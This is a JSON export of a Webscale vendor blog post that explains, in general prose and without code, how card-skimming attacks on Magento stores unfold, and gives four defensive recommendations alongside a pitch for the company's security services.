{"id":9920,"date":"2018-11-13T14:09:20","date_gmt":"2018-11-13T14:09:20","guid":{"rendered":"https:\/\/www.webscale.com\/?post_type=blog&p=9920"},"modified":"2023-12-29T08:30:27","modified_gmt":"2023-12-29T13:30:27","slug":"online-merchants-guide-securing-magento-storefronts","status":"publish","type":"post","link":"https:\/\/www.webscale.com\/blog\/online-merchants-guide-securing-magento-storefronts\/","title":{"rendered":"The Online Merchant\u2019s Guide to Securing Magento Storefronts"},"content":{"rendered":"

Magento recently confirmed<\/a> that their e-commerce platform suffered a massive malware attack that impacted about 5,000 Magento Open Source users. According to a Magento spokesperson, the sites were infected with MagentoCore, a malicious payment card data-stealing script designed to uncover simple passwords and compromise Magento websites.<\/p>\n

A notorious hacker group is exploiting<\/a> a long list of zero-day vulnerabilities in popular Magento extensions to inject digital skimming code into e-commerce sites. This attack vector abuses PHP\u2019s\u00a0unserialize()\u00a0function to inject their own PHP code into the site.<\/p>\n

While such news might sound like big revelations to some e-commerce business owners, the reality is that Magento exploits are fairly common. Given the means hackers and cyber-criminals have access to today, attacking a Magento storefront is actually remarkably simple.<\/p>\n

Not your problem? Think again.<\/h3>\n

These attacks can be prevented, but it\u2019s your<\/em> responsibility to prevent them.<\/p>\n

The issue is that a lot of ecommerce merchants<\/a> don\u2019t actually realize this. They think that since credit card information is handled by a third party, they\u2019re not responsible for the theft of card data.<\/p>\n

However, any attack that is executed via your website (that is part of the card holder\u2019s data environment) is your<\/em> responsibility \u2013 and once that has happened, a loss of brand, revenue, and customer loyalty is just the beginning. In fact, if credit card information is being used for money laundering or any kind of illegal activity, the Secret Service can show up at your doorstep and shut you down.<\/p>\n

Anatomy of an attack<\/h3>\n

Step 1 \u2013 Gaining admin access:<\/strong> Hackers and cybercriminals leverage Magento vulnerabilities to gain admin access to a site, either through brute force or a gradual process.<\/p>\n

When Magento identifies a vulnerability, they publish it \u2013 along with a security patch. The first thing merchants must do in these situations is run the patch, however, many don\u2019t and subsequently fall behind. Hackers, on the other hand, are always<\/em> keeping up with security patches. They know there\u2019s a good amount of merchants that won\u2019t install the security patch in time, so they track and compile lists of the exploits, and hire booter networks, or botnets, to run targeted probes to identify which sites they can target and to which they can gain admin access.<\/p>\n

This is easier than you think. Hackers can easily buy a list of all Magento websites in the world, and hire a botnet, for very little money, to monitor them all for the existence of the published vulnerabilities.<\/p>\n

Once hackers gain access to the admin, they can change anything on the site.<\/p>\n

Step 2 \u2013 Inserting malicious code:<\/strong> Most attackers are not interested in defacing a site \u2013 that\u2019s not valuable. They\u2019re interested in stealing credit card information.<\/p>\n

Once hackers have admin access, they embed links to a third-party JavaScript in some obscure blocks of your website, like the header or the footer, where it\u2019s unlikely you\u2019ll look for them (unless you\u2019re regularly looking for them).<\/p>\n

Browsers load third-party assets all the time. So, when you have third-party links embedded in the HTML you\u2019ve used to build your website, browsers accept these links and follow them because they came from a trusted source \u2013 your website!<\/p>\n

Once a browser loads an installed JavaScript, the code can then steal data (such as credit card details) from the web browser and send it off to a server elsewhere. One of the techniques to steal data, for example, is storing keystrokes when you type in your credit card information.<\/p>\n

This is really the essence of a Magento attack \u2013 hackers and cybercriminals just keep finding new ways to do it.<\/p>\n

Step 3 \u2013 Credit card abuse:<\/strong> After stealing confidential credit card information, cybercriminals can buy products online and have them shipped globally. They can also perform credit card laundering by running hundreds of small purchases using stolen credit card numbers and reselling the \u201csuccessful\u201d cards to organized crime rings.<\/p>\n

Most major attacks in e-commerce target the Magento platform \u2013 essentially because they can leverage the false confidence that merchants tend to have. So, how do you prevent these?<\/p>\n

4 things to do to make your Magento site significantly more secure<\/h3>\n
    \n
  1. Whitelist access to your admin:<\/strong> Hackers know what to install to exploit security vulnerabilities, and they want to use admin access to do it. Control access to your admin section by allowing whitelist-only access to a small set of site administrators. Also, frequently monitor and audit who has access to this section.<\/li>\n
  2. Prevent unauthorized PHP execution:<\/strong> After you\u2019ve whitelisted the IPs that have admin access, make sure you have mechanisms and processes to prevent random PHP execution on your site.<\/li>\n
  3. Mitigate malicious bots:<\/strong> Most sophisticated attacks are initiated by malicious bots, and you should be able to prevent them from gaining access to the application infrastructure. Solutions such as Webscale\u2019s Cloud Bot Manager<\/a> ensure that such bot attacks are identified and blocked, in real-time, using a combination of techniques such as IP reputation-based filtering, user agent based identification, behavioral analysis based on machine learning, anomaly patterns, and browser tests.<\/li>\n
  4. Work with a Security Partner:<\/strong> Security is an arms race. Make sure you have a diligent security partner that applies your security patches on a regular basis \u2013 faster than hackers can take advantage of them. Also, ensure this partner has robust cybersecurity capabilities \u2013 sophisticated technology and the right people \u2013 to provide you with 360-degree security<\/a> for your web application infrastructure \u2013 at the origin and the edge.<\/li>\n<\/ol>\n

    Lack of security is a very real problem. If there are 5,000 malware-affected Magento sites, it points to how big the problem is.<\/p>\n

    Sure, it\u2019s a small part of Magento\u2019s user base, but the bad guys are monitoring the whole Magento universe for exploits. That means your site could be under surveillance today, by hackers looking for a way in.<\/p>\n

    Every Magento storefront needs a comprehensive security strategy \u2013 with advanced technology and the right partner. If you don\u2019t, you\u2019re taking a huge risk. For a free assessment of your online storefront\u2019s security, fill out this form<\/a> or drop us an email at sales@webscalenetworks.com<\/a>.<\/p>\n

    You can also check out the session I presented at Meet Magento New York this year, along with Brent from Wagento, about how we’re helping merchants improve their security ahead of Black Friday. Watch the video here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

    Magento recently confirmed that their e-commerce platform suffered a massive malware attack that impacted about 5,000 Magento Open Source users. According to a Magento spokesperson, the sites were infected with MagentoCore, a malicious payment card data-stealing script designed to uncover simple passwords and compromise Magento websites. A notorious hacker group is exploiting a long list […]<\/p>\n","protected":false},"author":4,"featured_media":256289,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","rank_math_lock_modified_date":false,"_aioseo_description":"","_aioseo_keywords":"","_aioseo_og_article_section":"","_aioseo_og_article_tags":"","_aioseo_og_description":"","_aioseo_og_title":"","_aioseo_title":"","_aioseo_twitter_description":"","_aioseo_twitter_title":"","_author_photo":"field_6513304084a08","_doc_url":"","_dp_original":"","_et_autogenerated_title":"","_et_body_layout_enabled":"","_et_body_layout_id":"","_et_builder_dynamic_assets_loading_attr_threshold":"2","_et_builder_module_features_cache":null,"_et_builder_version":"BB|Divi|3.0.69","_et_default":"","_et_enabled":"","_et_footer_layout_enabled":"","_et_footer_layout_id":"","_et_header_layout_enabled":"","_et_header_layout_id":"","_et_pb_ab_current_shortcode":"","_et_pb_ab_subjects":"","_et_pb_built_for_post_type":"","_et_pb_custom_css":"","_et_pb_enable_shortcode_tracking":"","_et_pb_excluded_global_options":"","_et_pb_first_image":"","_et_pb_gutter_width":"","_et_pb_module_type":"","_et_pb_page_layout":"et_right_sidebar","_et_pb_page_z_index":"","_et_pb_post_hide_nav":"default","_et_pb_row_layout":"","_et_pb_show_page_creation":"","_et_pb_show_title":"on","_et_pb_side_nav":"off","_et_pb_static_css_file":"","_et_pb_truncate_post":"","_et_pb_truncate_post_date":"","_et_post_bg_color":"#ffffff","_et_post_bg_layout":"light","_et_template":[],"_et_theme_builder_marked_as_unused":"","_et_use_on":"","_gallery_link_target":"","_global_colors_info":"","_lh_copy_from_url-original_file":"","_version_history":"","_wp_old_date":[],"_wpcode_auto_insert":"","_wpcode_auto_insert_number":"","_wpcode_conditional_logic":[],"_wpcode_conditional_logic_enabled":"","_wpcode_library_id":"","_wpcode_library_version":"","_wpcode_location_extra":"","_wpcode_note":"","_wpcode_priority":"","_wpcode_shortcode_attributes":[],"_wpmf_gallery_custom_image_link":"","ao_post_optimize":[],"author_photo":"255858","doc_url":"","et_enqueued_post_fonts":{"family":{"et-gf-lato":"Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic"},"subset":["latin","latin-ext"],"cache_key":"{\"gph\":0,\"divi\":\"4.24.1\",\"wp\":\"6.6.2\",\"enable_all_character_sets\":\"false\"}"},"rank_math_contentai_score":{"wordCount":"100","linkCount":"0","headingCount":"100","mediaCount":"62.22"},"rank_math_description":"Learn more about how Magento attacks are executed, and four things you can do to make your site significantly more secure.","rank_math_facebook_image":"","rank_math_facebook_image_id":"","rank_math_internal_links_processed":["1","1","1"],"rank_math_og_content_image":[],"rank_math_seo_score":"17","rank_math_title":"","version_history":"","wp-smpro-smush-data":[],"wp-smush-animated":"","wpmf_filetype":"","wpmf_order":"","wpmf_size":"","_":"","_bj_lazy_load_skip_post":[],"_divi_filters_post_type":"","_et_dynamic_cached_attributes":{"sticky_position":["top"],"use_custom_gutter":["on"],"fullwidth":["off"],"button_icon":["$||divi||400"],"social_network":["facebook","twitter","linkedin","youtube","last_fm"],"header_2_font":"|800|||||||","header_2_font_size":"34px","header_2_text_align":"center","animation_intensity_slide":"10%","animation_duration":"800ms","animation_delay":"15ms","animation_intensity_zoom":"15%","animation_intensity_flip":"15%","animation_intensity_fold":"15%","animation_intensity_roll":"15%","animation_direction":"center","animation_style":"none","background_color_gradient_start":"rgba(255,255,255,0)","background_color_gradient_end":"#fafafa","custom_padding":"120px||0px||false|false","background_color_gradient_stops":"rgba(255,255,255,0) 0%|#fafafa 100%","custom_padding_last_edited":"on|desktop","custom_padding_tablet":"||30px||false|false","custom_padding_phone":"60px||||false|false"},"_et_dynamic_cached_shortcodes":["et_pb_post_content","et_pb_contact_field","et_pb_signup_custom_field","et_pb_social_media_follow_network","et_pb_section","et_pb_row","et_pb_column","et_pb_blog","et_pb_blurb","et_pb_button","et_pb_code","et_pb_contact_form","et_pb_post_nav","et_pb_post_title","et_pb_signup","et_pb_social_media_follow","et_pb_text"],"_et_pb_ab_bounce_rate_limit":"","_et_pb_ab_stats_refresh_interval":["hourly","hourly"],"_et_pb_content_area_background_color":"","_et_pb_dark_text_color":"","_et_pb_light_text_color":"","_et_pb_section_background_color":"","_job_location":"","_job_locations":"","_links_to":"","_links_to_target":"","_product_image_gallery":"","_schema_code":"","_synced_version":"","_wp_attachment_context":"","_wp_attachment_image_alt":[],"_wpie_source_url":"","_yoast_wpseo_content_score":"30","_yoast_wpseo_focuskeywords":"[]","_yoast_wpseo_metadesc":"Learn more about how Magento attacks are executed, and four things you can do to make your site significantly more secure.","_yoast_wpseo_opengraph-image":"","_yst_prominent_words_version":"1","inline_featured_image":["0","0","0","0","0","0"],"job_location":[],"job_locations":"","options":"","original-file":"","post_views_count":"3","rank_math_analytic_object_id":"2076","rank_math_canonical_url":"","rank_math_focus_keyword":[],"rank_math_news_sitemap_robots":"index","rank_math_primary_category":"0","rank_math_primary_ccategory":"","rank_math_primary_job_locations":"","rank_math_primary_partners_category":"","rank_math_primary_pr_category":"","rank_math_primary_press_release_year":"","rank_math_rich_snippet":"","rank_math_robots":["index"],"rank_math_schema_Article":[],"rank_math_schema_Organization":[],"rank_math_schema_VideoObject":[],"rank_math_shortcode_schema_s-23675683-fff5-4300-88fe-da8afc8b1bb9":"","rank_math_shortcode_schema_s-307bbc91-c6b1-41aa-950d-c50d435a949c":"","rank_math_shortcode_schema_s-63a052dbc0384":"","rank_math_shortcode_schema_s-63a052dbc039d":"","rank_math_shortcode_schema_s-63a052dbc03a6":"","rank_math_shortcode_schema_s-63a052dbc03aa":"","rank_math_shortcode_schema_s-63a052dbc03b5":"","rank_math_shortcode_schema_s-63a052dbc03ba":"","rank_math_shortcode_schema_s-63a052dbc03bd":"","rank_math_shortcode_schema_s-63b6dd7d53a96":"","rank_math_shortcode_schema_s-63b6dd7d53a9f":"","rank_math_shortcode_schema_s-63b6dd7d53aa2":"","rank_math_shortcode_schema_s-63b6dd7d53aa4":"","rank_math_shortcode_schema_s-63b6dd7d53aa7":"","rank_math_shortcode_schema_s-63b6dd7d53aa9":"","rank_math_shortcode_schema_s-63b6dd7d53aab":"","rank_math_shortcode_schema_s-63b6dd7d53aad":"","rank_math_shortcode_schema_s-63b6dd7d53aaf":"","rank_math_shortcode_schema_s-63c15fcf43311":"","rank_math_shortcode_schema_s-63c15fcf43322":"","rank_math_shortcode_schema_s-63c15fcf43325":"","rank_math_shortcode_schema_s-63c15fcf43327":"","rank_math_shortcode_schema_s-63c15fcf43329":"","rank_math_shortcode_schema_s-63c15fcf4332a":"","rank_math_shortcode_schema_s-63c15fcf4332c":"","rank_math_shortcode_schema_s-63c15fcf4332e":"","rank_math_shortcode_schema_s-63c15fcf43330":"","rank_math_shortcode_schema_s-63f52c5ed40bb":"","rank_math_shortcode_schema_s-6409f40a9b7d5":"","rank_math_shortcode_schema_s-64354a3892419":"","rank_math_shortcode_schema_s-6440158136148":"","rank_math_shortcode_schema_s-6446d2f9353ee":"","rank_math_shortcode_schema_s-6446d2f9353f3":"","rank_math_shortcode_schema_s-6447c0fe4673c":"","rank_math_shortcode_schema_s-64e4d743542d7":"","schema_code":"","smush-complete":"","smush-info":"","smush-stats":[],"synced_version":"","wpmf_remote_video_link":"","_exp":"","_inc":"","_mc4wp_settings":[],"_post-subtitle":"field_5bb39e15297d0","_pwh_dcfh_contact_email":"","_pwh_dcfh_contact_form_id":"","_pwh_dcfh_form_fields":"","_pwh_dcfh_ip_address":"","_pwh_dcfh_page_id":"","_pwh_dcfh_read_by":"","_pwh_dcfh_referer_url":"","_pwh_dcfh_user_agent":[],"_section1_col1":"","_section1_col2":"","_section1_col3":"","_section1_col4":"","_section2_col1":"","_section2_col2":"","_section2_col3":"","_section2_col4":"","_section2_col5":"","_section2_col6":"","_section3_col1":"","_section3_col2":"","_section3_col3":"","_section3_col4":"","_section3_col5":"","_section3_col6":"","_section4_col1":"","_section4_col2":"","_section4_col3":"","_section4_col4":"","_section4_col5":"","_section4_col6":"","_section5_col1":"","_section5_col2":"","_section5_col3":"","_section5_col4":"","_section5_col5":"","_section5_col6":"","_section6_col1":"","_section6_col2":"","_section6_col3":"","_section6_col4":"","_section6_col5":"","_section6_col6":"","_select_author":"","_test":"","_wp_attachment_backup_sizes":[],"_yoast_wpseo_estimated-reading-time-minutes":[],"_yoast_wpseo_focuskw":[],"_yoast_wpseo_focuskw_text_input":[],"_yoast_wpseo_linkdex":[],"_yoast_wpseo_meta-robots-nofollow":[],"_yoast_wpseo_meta-robots-noindex":[],"_yoast_wpseo_primary_category":["",""],"_yoast_wpseo_title":[],"_yoast_wpseo_wordproof_timestamp":"","exp":"","inc":"","post-subtitle":["",""],"rank_math_schema_BlogPosting":[],"section1_col1":"","section1_col2":"","section1_col3":"","section1_col4":"","section2_col1":"","section2_col2":"","section2_col3":"","section2_col4":"","section2_col5":"","section2_col6":"","section3_col1":"","section3_col2":"","section3_col3":"","section3_col4":"","section3_col5":"","section3_col6":"","section4_col1":"","section4_col2":"","section4_col3":"","section4_col4":"","section4_col5":"","section4_col6":"","section5_col1":"","section5_col2":"","section5_col3":"","section5_col4":"","section5_col5":"","section5_col6":"","section6_col1":"","section6_col2":"","section6_col3":"","section6_col4":"","section6_col5":"","section6_col6":"","select_author":"","test":"","footnotes":""},"categories":[1,25,7],"tags":[],"class_list":["post-9920","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-magento-adobe","category-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts\/9920"}],"collection":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/comments?post=9920"}],"version-history":[{"count":0,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts\/9920\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/media\/256289"}],"wp:attachment":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/media?parent=9920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/categories?post=9920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/tags?post=9920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}